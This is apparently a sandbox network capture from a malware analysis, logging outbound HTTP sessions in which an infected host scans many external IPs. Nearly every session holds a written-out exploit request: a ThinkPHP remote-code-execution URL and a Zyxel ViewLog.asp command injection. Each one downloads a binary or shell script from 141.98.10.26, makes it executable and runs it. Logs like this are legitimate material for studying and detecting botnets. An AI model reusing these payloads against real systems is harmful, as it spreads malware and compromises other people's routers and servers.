Nov 22, 2023 08:40:03.329211950 CET	16163	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:12.287918091 CET	17240	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:31.485332012 CET	19596	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:08.344214916 CET	19783	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
742	192.168.2.23	49734	95.130.254.15	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.664720058 CET	15140	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:54.847964048 CET	15146	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:54 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
743	192.168.2.23	56548	31.134.121.40	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.736233950 CET	15142	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:54.954173088 CET	15151	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
744	192.168.2.23	33318	95.211.226.142	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.848289967 CET	15146	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:55.029766083 CET	15154	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 07:39:54 GMT Server: Apache/2 Content-Length: 390 Keep-Alive: timeout=1, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 62 72 61 6d 2e 6e 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.abram.nl Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
745	192.168.2.23	39272	95.80.31.56	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.929553986 CET	15148	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:55.130494118 CET	15155	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Wed, 22 Nov 2023 07:39:55 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
746	192.168.2.23	41556	95.110.155.13	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.934206009 CET	15148	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
747	192.168.2.23	52756	31.25.134.33	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.948577881 CET	15150	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
748	192.168.2.23	33694	95.181.164.12	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.949711084 CET	15151	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:55.171386957 CET	15157	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Wed, 22 Nov 2023 07:39:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 9d<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
749	192.168.2.23	52876	95.104.86.79	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:55.277488947 CET	15252	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:55.517110109 CET	15266	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:39:55.517124891 CET	15267	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
750	192.168.2.23	51366	95.192.74.5	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:55.713820934 CET	15271	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
751	192.168.2.23	58056	95.86.78.122	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:55.735775948 CET	15272	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
752	192.168.2.23	43116	88.198.124.34	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:57.726492882 CET	15442	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:57.923365116 CET	15444	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:57 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 313 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6d 61 69 6c 2e 6a 6f 65 72 67 6a 61 6b 6f 62 73 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at mail.joergjakobs.info Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
753	192.168.2.23	36640	95.101.251.133	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:57.908451080 CET	15443	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:58.095523119 CET	15506	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:57 GMT Date: Wed, 22 Nov 2023 07:39:57 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 63 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 37 39 37 26 23 34 36 3b 32 33 33 31 37 66 38 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.8c3f655f.1700638797.23317f81</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
754	192.168.2.23	50650	95.216.200.120	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:58.102834940 CET	15507	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:58.300041914 CET	15572	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:39:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 61 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a6<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
755	192.168.2.23	46392	95.85.185.234	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:58.122026920 CET	15507	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
756	192.168.2.23	54456	94.110.182.133	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:58.195822001 CET	15509	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
757	192.168.2.23	37086	94.120.231.132	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:58.232929945 CET	15571	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
758	192.168.2.23	36412	95.57.104.200	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.188286066 CET	15628	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:59.467905045 CET	15727	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:39:59.467926979 CET	15728	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
759	192.168.2.23	56232	31.200.105.5	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.244165897 CET	15689	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
760	192.168.2.23	58568	94.120.51.233	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:59.244224072 CET	15690	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

